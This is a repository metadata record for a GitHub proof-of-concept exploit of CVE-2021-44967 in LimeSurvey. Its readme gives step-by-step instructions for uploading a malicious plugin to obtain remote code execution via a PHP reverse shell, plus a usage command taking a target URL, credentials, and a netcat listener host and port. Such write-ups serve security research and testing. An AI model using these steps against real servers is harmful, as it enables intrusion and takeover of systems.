{"id":28003672,"url":"https://github.com/d3ext/cve-2021-44967","last_synced_at":"2025-05-09T02:17:54.093Z","repository":{"id":271871983,"uuid":"912395761","full_name":"D3Ext/CVE-2021-44967","owner":"D3Ext","description":"POC exploit for CVE-2021-44967","archived":false,"fork":false,"pushed_at":"2025-01-10T11:59:26.000Z","size":105,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-05-09T02:17:51.155Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/D3Ext.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-01-05T13:12:07.000Z","updated_at":"2025-01-10T11:59:34.000Z","dependencies_parsed_at":"2025-01-10T12:59:40.061Z","dependency_job_id":null,"html_url":"https://github.com/D3Ext/CVE-2021-44967","commit_stats":null,"previous_names":["d3ext/limesurvey-rce"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FCVE-2021-44967","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FCVE-2021-44967/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FCVE-2021-44967/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FCVE-2021-44967/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/D3Ext","download_url":"https://codeload.github.com/D3Ext/CVE-2021-44967/tar.gz/refs/hea
ds/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":253176445,"owners_count":21866143,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-05-09T02:17:53.585Z","updated_at":"2025-05-09T02:17:54.078Z","avatar_url":"https://github.com/D3Ext.png","language":"Python","readme":"# CVE-2021-44967\n\nThis repository contains a POC (Proof of Concept) of the CVE-2021-44967 vulnerability, which affects LimeSurvey 5.2 and higher versions. It allows an authenticated user to upload their own malicious plugins, leading to RCE (Remote Code Execution) through PHP code execution. This exploit uses a PHP reverse shell which is triggered once the malicious plugin is uploaded.\n\n# Explanation\n\nExploiting this vulnerability consists of creating an XML config file and a PHP file, then compressing them into a ZIP file. Once you have uploaded, installed and activated the plugin, the PHP code should be accessible on the web. It can be exploited manually by following these steps:\n\n1. Create a ZIP containing the PHP file and the config file\n2. Log in to LimeSurvey\n3. Go to Configuration -\u003e Plugins -\u003e Upload \u0026 Install\n4. Upload your ZIP file\n5. Install it\n6. Finally, activate your plugin\n7. 
Then your PHP code should be accessible under /upload/plugins/\u003cplugin_name\u003e/\u003cphp_file\u003e\n\n# Usage\n\n```\nusage: exploit.py [-h] --url URL --user USER --password PASSWORD --lhost LHOST --lport LPORT [--verbose]\n\nLimeSurvey - RCE\n\noptions:\n  -h, --help           show this help message and exit\n  --url URL            URL of the LimeSurvey web root\n  --user USER          username to log in\n  --password PASSWORD  password of the username\n  --lhost LHOST        local host to receive the reverse shell\n  --lport LPORT        local port to receive the reverse shell\n  --verbose            enable verbose\n```\n\nStart a netcat listener and then execute the exploit like this:\n\n```\npython3 exploit.py --url \u003cURL\u003e --user \u003cusername\u003e --password \u003cpassword\u003e --lhost \u003clocal host\u003e --lport \u003clocal port\u003e\n```\n\n# Demo\n\n\u003cimg src=\"demo.png\"\u003e\n\n# References\n\n```\nhttps://github.com/Y1LD1R1M-1337/Limesurvey-RCE\nhttps://www.exploit-db.com/exploits/50573\nhttps://github.com/p0dalirius/LimeSurvey-webshell-plugin\nhttps://ine.com/blog/cve-2021-44967-limesurvey-rce\nhttps://pentest-tools.com/vulnerabilities-exploits/limesurvey-524-rce-vulnerability_13029\n```\n\n# License\n\nThis project is under [MIT](https://github.com/D3Ext/LimeSurvey-RCE/blob/main/LICENSE) license\n\nCopyright © 2025, *D3Ext*\n\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd3ext%2Fcve-2021-44967","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fd3ext%2Fcve-2021-44967","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd3ext%2Fcve-2021-44967/lists"}